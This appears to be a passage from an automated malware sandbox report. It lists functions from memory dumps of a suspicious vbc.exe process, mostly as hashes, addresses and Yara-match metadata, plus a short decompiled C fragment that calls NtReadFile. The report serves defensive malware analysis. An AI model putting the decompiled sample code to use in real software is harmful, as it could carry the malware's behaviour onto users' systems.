Opcode ID: 8a56e092509a3ce951b3d93587a21b53e622654f35a07bd70c6348c180052ae9
Instruction ID: 023f770e6f0c22ba068ec21f22faaa8be3e6f4113d76f16647accf189526ff91
Opcode Fuzzy Hash: 8a56e092509a3ce951b3d93587a21b53e622654f35a07bd70c6348c180052ae9
Instruction Fuzzy Hash: EBE0C974D0821CDBDB44EFE9D8415AEFBF4AB84304F0089AA9818A3351E7702A419F40

Uniqueness

Uniqueness Score: -1.00%

Function 04F0E148, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cffbca50abee0f194b48c1ffa5909ece07f7647730a934aa8daaa2f3d9591c1
Instruction ID: 4a8a5ffc12955197c836d649a810324775a462a8e513dd850c347b4cf1edd5a6
Opcode Fuzzy Hash: 6cffbca50abee0f194b48c1ffa5909ece07f7647730a934aa8daaa2f3d9591c1
Instruction Fuzzy Hash: 79F0A570D0521C9FCB40EFE8D94169EBBF5EB48300F5085AAD528A3341E7745A418F81

Uniqueness

Uniqueness Score: -1.00%

Function 04F0DE70, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7dac026f2c68762d218be40a4c8f623310c4592109d0ac7514d946261022138
Instruction ID: 5b4b567e9b0e203a29173a9470f8cd2d57ee176f426e387801b7b00ccd89c29e
Opcode Fuzzy Hash: d7dac026f2c68762d218be40a4c8f623310c4592109d0ac7514d946261022138
Instruction Fuzzy Hash: 5BF01EB4D00218EFCB00EFA8D940AAEFBB4FB48301F1085AAD918A3310E3719A40DF80

Uniqueness

Uniqueness Score: -1.00%

Function 04F09AD8, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dab281a64095706f3abc8a235a70cc4e2641000a2cc19e962c1455090f8cdb37
Instruction ID: 46c113d3ab1049ae9cd9d519fc5f2c5e6a85b8886bdf4e0856d91ec584b09e11
Opcode Fuzzy Hash: dab281a64095706f3abc8a235a70cc4e2641000a2cc19e962c1455090f8cdb37
Instruction Fuzzy Hash: FFE08C3090420CEFCB14EFE4E885AADBB79FB86301F208168DC4423360EB705E94DB86

Uniqueness

Uniqueness Score: -1.00%

Function 04F0C609, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93654c87f345f63e1c841fae982eb2f1c45b9cedeff6fd5ddb31cd08199ced9
Instruction ID: 37cd12be7633ea91fa19c49cca5b3244125f8abd9b7cca398149f0f61997d58e
Opcode Fuzzy Hash: d93654c87f345f63e1c841fae982eb2f1c45b9cedeff6fd5ddb31cd08199ced9
Instruction Fuzzy Hash: 20E017304062089FC310EBB0EE0EB59BBECEB8A30AF0195A8E519D7621EB7058409B91

Uniqueness

Uniqueness Score: -1.00%

Function 04F0C618, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16691c60573975fd040085310ed0c62e5d8e080974001f8ad1dcfbb2e07ea56c
Instruction ID: 3a307db42d0f851de4b22c7324453f070ac1855f0076304bb26d5b919e48dfda
Opcode Fuzzy Hash: 16691c60573975fd040085310ed0c62e5d8e080974001f8ad1dcfbb2e07ea56c
Instruction Fuzzy Hash: F3D012308062189BC710EFF4ED0D759B7ACD74A30AF119564D50DD3561EB711880DF92

Uniqueness

Uniqueness Score: -1.00%

Function 04F0CADA, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f7fc6dc9dcb0c7f78e682bc4b385b0b6f62daa39330f0976d407bf19a9a37d6
Instruction ID: 5243d5c31c2f0a22fb5049fa86edd2e152be5ca66ca228151b957d7fede3b8d6
Opcode Fuzzy Hash: 6f7fc6dc9dcb0c7f78e682bc4b385b0b6f62daa39330f0976d407bf19a9a37d6
Instruction Fuzzy Hash: D4D01770E052288BCB64CFA8C54228DBBF2AB85300F20D596D019BB614E2309A419F21

Uniqueness

Uniqueness Score: -1.00%

Function 04F0EA32, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a1ae9feafeda10addca01b3e880a2792364c6f072351ed3395d9c1227e2249
Instruction ID: 1387b86b7d23f64ae3e51482de3c44b8c9c59574bf3a30c89a4860987ffeab73
Opcode Fuzzy Hash: 24a1ae9feafeda10addca01b3e880a2792364c6f072351ed3395d9c1227e2249
Instruction Fuzzy Hash: 4BD06778905258CFCB54CF90C9849EDBBB2EB89302F204095E40977350CB31AE81DF40

Uniqueness

Uniqueness Score: -1.00%

Function 04F0E767, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aa7a7b510d0e0a765a538de0d96974c3964a07eef8cc302baf931fa6a7825de
Instruction ID: 9386d4a757af368fa7265e6326a54efb2d0e428ebe6694e196c4383b11154d15
Opcode Fuzzy Hash: 2aa7a7b510d0e0a765a538de0d96974c3964a07eef8cc302baf931fa6a7825de
Instruction Fuzzy Hash: 59D0C975605354CFC708CFA0C68445EBFB2AF89311B108469900AAB664DB3AE981DF50

Uniqueness

Uniqueness Score: -1.00%

Function 04F0E7E3, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f36b710d60a398d9216ad8c04b32065f61414e0339dd1022f0befbef866093b6
Instruction ID: 16acce854eed10e7b50d8e6f10656e471a0be781e28602b3aa1ecda808c8080e
Opcode Fuzzy Hash: f36b710d60a398d9216ad8c04b32065f61414e0339dd1022f0befbef866093b6
Instruction Fuzzy Hash: B6C08C32B05486CF8704CED0D0C205ABBB6AB88341F11A426C90A9B568E3389102AB00

Uniqueness

Uniqueness Score: -1.00%

Function 04F09DB7, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 776ec790c1457590f05e98a8dbcadf7836fb0f7a6f6397b66bec4aa013fa2e22
Instruction ID: 77e0a8e08f6f1a1c5611392c6f3df46365acf1a78f70a7b9c714df4a8aa0a9f6
Opcode Fuzzy Hash: 776ec790c1457590f05e98a8dbcadf7836fb0f7a6f6397b66bec4aa013fa2e22
Instruction Fuzzy Hash: FBA002C51AE568C58090163518515AD2099969703C7819B1007BB016DBF9445242644C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00403E20, Relevance: 2.8, Strings: 2, Instructions: 252COMMON

Download Yara Rule

Strings

6&MJ, xrefs: 0040402F
.I0f, xrefs: 00403FBA

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID: .I0f$6&MJ
API String ID: 0-3795406945
Opcode ID: 7d991881d687f3b7359cb9f618c3452625e9de85270a121ac5721e189302bb15
Instruction ID: 360f27042c086852acb3de57e16698361ba2ebdbfd7a40dcb2171b345077c0c2
Opcode Fuzzy Hash: 7d991881d687f3b7359cb9f618c3452625e9de85270a121ac5721e189302bb15
Instruction Fuzzy Hash: 86A13674E00219CBCB04CFE9C9805DEFBF6BF89315F64852AD405BB358E7389A428B65

Uniqueness

Uniqueness Score: -1.00%

Function 00401710, Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

C$, xrefs: 004018F0
C$, xrefs: 004018F7

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID: C$$C$
API String ID: 0-2392338144
Opcode ID: b2989a800adf2afbe5f8606855404fdcb81334e90582fad4e32f84f14c06e410
Instruction ID: 0d0dfeba3c346fe297e6cf7d73e2f6389cf815e7b02303e1a6a5471d5994932e
Opcode Fuzzy Hash: b2989a800adf2afbe5f8606855404fdcb81334e90582fad4e32f84f14c06e410
Instruction Fuzzy Hash: 9471C274E05219DFCB08CFA9C6805DEFBF2EF89310F24942AD415BB364D7349A428B69

Uniqueness

Uniqueness Score: -1.00%

Function 0137B673, Relevance: 2.5, Instructions: 2457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2160804116.0000000001372000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000006.00000002.2160798405.0000000001370000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2160944696.000000000147A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f0e6cc5ef3304b1faefb1ae3833e2d98d83ae8b92aa53af6c4910d93ce75b3
Instruction ID: c38db4330fef30a92d41792513451b77050c41ba3b9c0ad926c122f71e9079ad
Opcode Fuzzy Hash: 69f0e6cc5ef3304b1faefb1ae3833e2d98d83ae8b92aa53af6c4910d93ce75b3
Instruction Fuzzy Hash: 2A13D5A690E3C19FCB230B386DB52D5BFB19E27118B1E08C7C4C18E4A7D158199BDB67

Uniqueness

Uniqueness Score: -1.00%

Function 00407F00, Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

THYd, xrefs: 00407FBD

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID: THYd
API String ID: 0-973396173
Opcode ID: ee19cc1c550d8c834264936bcc95525335ac6cd5abb192605315c916457c14bc
Instruction ID: 433e68e07c3c16e7472ce41259aee498f3b4b344e48db1c0847f0ef78d8e4a61
Opcode Fuzzy Hash: ee19cc1c550d8c834264936bcc95525335ac6cd5abb192605315c916457c14bc
Instruction Fuzzy Hash: B4A11874E1920ACFCB04CFA6D9815AEFBB2BF89300F20942AD415BB355D73899428F56

Uniqueness

Uniqueness Score: -1.00%

Function 00405865, Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

}31, xrefs: 0040591F

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID: }31
API String ID: 0-3696953589
Opcode ID: d4c8462462caf636be1f8751685be622ba31693efd542defd8a1bf7724e2bb6d
Instruction ID: 3f5fc5312d77c9d08cea1262d76ba6fa9a9da4bf5ab1191304c535bf97615bc3
Opcode Fuzzy Hash: d4c8462462caf636be1f8751685be622ba31693efd542defd8a1bf7724e2bb6d
Instruction Fuzzy Hash: EF817D70E046658FCB14CFA9C9805AEFBF6FF86304F24C1AAD845A7246D6349942CF61

Uniqueness

Uniqueness Score: -1.00%

Function 004058A8, Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

}31, xrefs: 0040591F

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID: }31
API String ID: 0-3696953589
Opcode ID: 373816c7969bc145017de25dfefbbfcf096bcfcd00a4a332cf463d3b31063e5e
Instruction ID: 1621ea9f00233ff75dfe90668e0aba58343a3a42554c29c7f320d05e09993412
Opcode Fuzzy Hash: 373816c7969bc145017de25dfefbbfcf096bcfcd00a4a332cf463d3b31063e5e
Instruction Fuzzy Hash: E1615970E145698BCB14DFA9C5805AEFBF2FBC9304F24C56AD809A724AD7309D41CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401151, Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

p@|t, xrefs: 004012BF

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID: p@|t
API String ID: 0-3993203103
Opcode ID: 6227d437bd38bbb823bdda90b6d6f0a5e93398fe41100b2c3bb749308e32bec7
Instruction ID: 7bbb62cf022a52a10734da4b19ffe8b59e74facb565e16523f15dd03ca5c0553
Opcode Fuzzy Hash: 6227d437bd38bbb823bdda90b6d6f0a5e93398fe41100b2c3bb749308e32bec7
Instruction Fuzzy Hash: 09612B70E05209DFDB04CF99C5815EEFBB2BF89340F24856AD515BB254D3389A42CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB8, Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

EemC, xrefs: 00401C3B

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID: EemC
API String ID: 0-4229200664
Opcode ID: afe9ecd88d5c9640ba16b950972169a6b36e4b1f5909c871ab1f0d2663eff284
Instruction ID: c9c574946dd9f7c7d10a431355dc0458d3acd30fb047a79263e8b96a2b4dd200
Opcode Fuzzy Hash: afe9ecd88d5c9640ba16b950972169a6b36e4b1f5909c871ab1f0d2663eff284
Instruction Fuzzy Hash: B611F971E046188BEB58CFABDD4029EFBF7AFC8300F04C07AC908A6264EB3455428F15

Uniqueness

Uniqueness Score: -1.00%

Function 00401BA8, Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

EemC, xrefs: 00401C3B

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID: EemC
API String ID: 0-4229200664
Opcode ID: 7b2e8cea507011ad1b748fc38501ec0f3abbdc60bdf4b6a65c278d6625783e41
Instruction ID: fe606ac0302c87dffa234e3421615b35dcb2444b884ecba65a41b9ec91915921
Opcode Fuzzy Hash: 7b2e8cea507011ad1b748fc38501ec0f3abbdc60bdf4b6a65c278d6625783e41
Instruction Fuzzy Hash: D021E7B1E046188BEB18CFABC94069EFBF3AFC9300F08C07AC508A6264EB3455428F15

Uniqueness

Uniqueness Score: -1.00%

Function 00405270, Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8ce74cf441af38a78febe43d4e98c5845fabdbbc38d395dc86c72cf818029cf
Instruction ID: 013fd983b6982696d1a80709a571cfd44e9b90ea8fe06ef23e7f7cb3faf75881
Opcode Fuzzy Hash: e8ce74cf441af38a78febe43d4e98c5845fabdbbc38d395dc86c72cf818029cf
Instruction Fuzzy Hash: 1A714B70E105698BCB14DFA9C5805AEFBF2FFC9304F64C56AD808A724AD7349942CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00400322, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbb96148943c75f168b50b2915e19fe96fe86a9e196711ab6c83d476c4d87d38
Instruction ID: a6fe7aeca622f821cfedea16e0b3f6e98824a70efa5b7f0155581e3b1c11ca05
Opcode Fuzzy Hash: fbb96148943c75f168b50b2915e19fe96fe86a9e196711ab6c83d476c4d87d38
Instruction Fuzzy Hash: A4710234E152099FCB08CFA9D48499EFBF1FF89310F148566E818AB364D734AA41CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00405260, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 767ac08a8fb8f8ada7e591b96a2eddc0620493fedac688f8fb5441955b52efc7
Instruction ID: 5d7b2f172b7fc4f66e2854da5c2606e89931908f09ea74542c2cdd25ed5b750a
Opcode Fuzzy Hash: 767ac08a8fb8f8ada7e591b96a2eddc0620493fedac688f8fb5441955b52efc7
Instruction Fuzzy Hash: 59714870E145698BCB14CFA9C9805AEFBF2FFC9304F64C56AD808A724AD7349942CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00400330, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa1a1f3d683627549880085cd39e51282c28623da33bd3b8ca53c921fe2c92cb
Instruction ID: bc2816cb155696f3810a82b5e87542d1c08bf668aa74ea93ea1c127408518b16
Opcode Fuzzy Hash: aa1a1f3d683627549880085cd39e51282c28623da33bd3b8ca53c921fe2c92cb
Instruction Fuzzy Hash: B071E174E112199FCB08CFA9D58499EFBF1FF88310F148566E818BB264D734AA41CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004042D7, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b846c2c51e5f315356c595474e345cdabd2e10fe7bf2c5efc139264f9a05f7
Instruction ID: a835074022d9dd56f3e5545d93ed9bcac871e54a840b2894c153c6a6b7855e39
Opcode Fuzzy Hash: 44b846c2c51e5f315356c595474e345cdabd2e10fe7bf2c5efc139264f9a05f7
Instruction Fuzzy Hash: 66616AB0E04219DFCB04CFAAD4406EEBBF2AFC9314F54D426D515B7254D73899428FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040170C, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65b212f72a938b1a8d97255a212d074d7eb91d36932a70ae6499d3413f0a63b6
Instruction ID: 15e9c91809eac460e221e2a2f163c7808bac3ee7f05b2f3bbbb3c54ca3bedb42
Opcode Fuzzy Hash: 65b212f72a938b1a8d97255a212d074d7eb91d36932a70ae6499d3413f0a63b6
Instruction Fuzzy Hash: 4261D374E05219CFCB08CFA9C6815DEFBF2EF89310F24942AD415B7364D7349A428B69

Uniqueness

Uniqueness Score: -1.00%

Function 00401990, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22da32af21d4d1de6e03dbec57bbc13caadd082d5f585f27b6a999e50fd33898
Instruction ID: 04a5ef5bbbb28fdcb79de5120cb44a99c6d1515597f21bc7f8a99a5386cefcd9
Opcode Fuzzy Hash: 22da32af21d4d1de6e03dbec57bbc13caadd082d5f585f27b6a999e50fd33898
Instruction Fuzzy Hash: 3E51D9B0E0560A9FCB04CFE6C5815AEFBF2EF89300F24D46AC515B7265E3349A42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004019A0, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 633e009089dd09b93b91045c312c2eefb3e4880bf427216da1722f25d306cda6
Instruction ID: 88fb6615dfab9abd829fe832f0b0502ff88d5c28c6b5218cc10443b826748357
Opcode Fuzzy Hash: 633e009089dd09b93b91045c312c2eefb3e4880bf427216da1722f25d306cda6
Instruction Fuzzy Hash: 9851CBB0E0560ADFCB04CFE6C5815AEFBF2EB88300F24956AC515B7264E7349A41CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00401508, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0dc7b1f9e640bc34508b4800c543c4e8b884688232441cc5e6600292b3a1d1
Instruction ID: 078f8eefa3dc246f2c2a564956cfcbc9d1acb69963d20bb2a33b4b9db3759749
Opcode Fuzzy Hash: dc0dc7b1f9e640bc34508b4800c543c4e8b884688232441cc5e6600292b3a1d1
Instruction Fuzzy Hash: E141E7B0E0460ADBCB04CFAAC9815EEFBF2BF88340F24D46AD515B7254D7349A428F95

Uniqueness

Uniqueness Score: -1.00%

Function 00401502, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b80806c8bf0a73dbb999d919ef559d71380eeebf4447794ce7a1e973aacc64c4
Instruction ID: c8611db2829539f4dc78818016b7ca954ff827430f749d390473577e15d53842
Opcode Fuzzy Hash: b80806c8bf0a73dbb999d919ef559d71380eeebf4447794ce7a1e973aacc64c4
Instruction Fuzzy Hash: B841DAB0D0460A9FCB04CFAAC9815AEFBF2BF88300F24C56AD515B7254D73496428F95

Uniqueness

Uniqueness Score: -1.00%

Function 00403490, Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 097cdc77d6308ca10f5f6eb198107a399501a4cd6fe377cc8e01bb48ecad9f4a
Instruction ID: a5290ef4bb2ba51656a695c3ba4b310ec33f7634397eb852c9e44a12171e4ffe
Opcode Fuzzy Hash: 097cdc77d6308ca10f5f6eb198107a399501a4cd6fe377cc8e01bb48ecad9f4a
Instruction Fuzzy Hash: 2D31E271D092858FDB05CF7A89545DABFF2EFC6210F08C1ABC449A7266D7384A06CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00409A50, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaeea17291f9e9e158a9845df1be17777c97c60ca9ed712081e9397497cc524a
Instruction ID: ac9dc866012cfe57e0f27adf0d76833a536afeea018fff621d74986e87efab15
Opcode Fuzzy Hash: eaeea17291f9e9e158a9845df1be17777c97c60ca9ed712081e9397497cc524a
Instruction Fuzzy Hash: 25214630A152599BCF10CFA9E844AEEBBF4AB4A310F145436E405F3282EB389D44CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00409A40, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6763f7df001932a4f583bf0e17c62929a208a00c3c2701999b086a3bd42a553
Instruction ID: b6c7a77bb9115d53c94634cc200106993bf87c77eb29967d10804f791903ed6c
Opcode Fuzzy Hash: e6763f7df001932a4f583bf0e17c62929a208a00c3c2701999b086a3bd42a553
Instruction Fuzzy Hash: 53216730A1625A9BDB10CFA8D854BEEBBF0AB4A310F14443AE441F3382D7788D44CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00409B42, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50d7f7f583833dc2a1be0527aae83a20ac1ae682c748d74e5b1c128af1d3d6b
Instruction ID: 4a67a088470508de9a181103a65502a063edd61e16dd315cbdb7f48e0997e4f9
Opcode Fuzzy Hash: b50d7f7f583833dc2a1be0527aae83a20ac1ae682c748d74e5b1c128af1d3d6b
Instruction Fuzzy Hash: 0D119134C052598FDB108F64E858BEEBFF0AB4A311F14906AD451B32D2CB786D48DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409B50, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b07826c6bb6dee2f30f1fbec9fad8fcd912d92d39c55652d374a2a87cd1398
Instruction ID: ae1e20c9aacd6171cb6455b89329992502033c9e3fee776e5bcfdc7b54eabebb
Opcode Fuzzy Hash: 44b07826c6bb6dee2f30f1fbec9fad8fcd912d92d39c55652d374a2a87cd1398
Instruction Fuzzy Hash: D9115730D042188BDB14CFA5D858BEEFBF0AB4E310F24906AD451B3291CB789D84DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00405FFF, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71119db5ad698fee6bd593b585a20473ac73f1ee4df1815a4cbfc6ed23d68671
Instruction ID: 753244281ffcd2419a4ef07fefb27d30a7bfa3e3e2c9ddc520b4ceb097ff9074
Opcode Fuzzy Hash: 71119db5ad698fee6bd593b585a20473ac73f1ee4df1815a4cbfc6ed23d68671
Instruction Fuzzy Hash: 31115870E106188BEB18CFABD9447AEBAF3AFC9300F14C07AD408B6364EB7449418B50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2224 Parent PID: 3020 vbc.exeCOMMON

Executed Functions

Function 004182AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004182AC(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t22;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;

				if(__eflags != 0) {
					asm("in al, dx");
					_t17 = _a8;
					_t34 = _a8 + 0xc48;
					E00418DB0(_t32, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
					_t6 =  &_a36; // 0x413d42
					_t12 =  &_a12; // 0x413d42
					_t22 =  *((intOrPtr*)( *_t34))( *_t12, _a16, _a20, _a24, _a28, _a32,  *_t6, _a40, _a44, _t33); // executed
					return _t22;
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t14 = __eax + 0x10; // 0x300
					_t15 = __eax + 0xc4c; // 0x40972f
					__esi = _t15;
					E00418DB0(__edi, _a4, __esi,  *_t14, 0, 0x2b) =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}

0x004182ae
0x00418262
0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9
0x004182b0
0x004182b1
0x004182b3
0x004182b6
0x004182bf
0x004182bf
0x004182cf
0x004182d5
0x004182d7
0x004182d8
0x004182d9
0x004182d9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
Instruction ID: 196597b99329607a985bdc56155312d81ebdbcd7e96d663e18f2c25ff9a64cf5
Opcode Fuzzy Hash: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
Instruction Fuzzy Hash: F9110972200204AFCB14DF99DC85EEB77A9EF8C754F158659BA1D97241CA30E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				asm("in al, dx");
				_t13 = _a4;
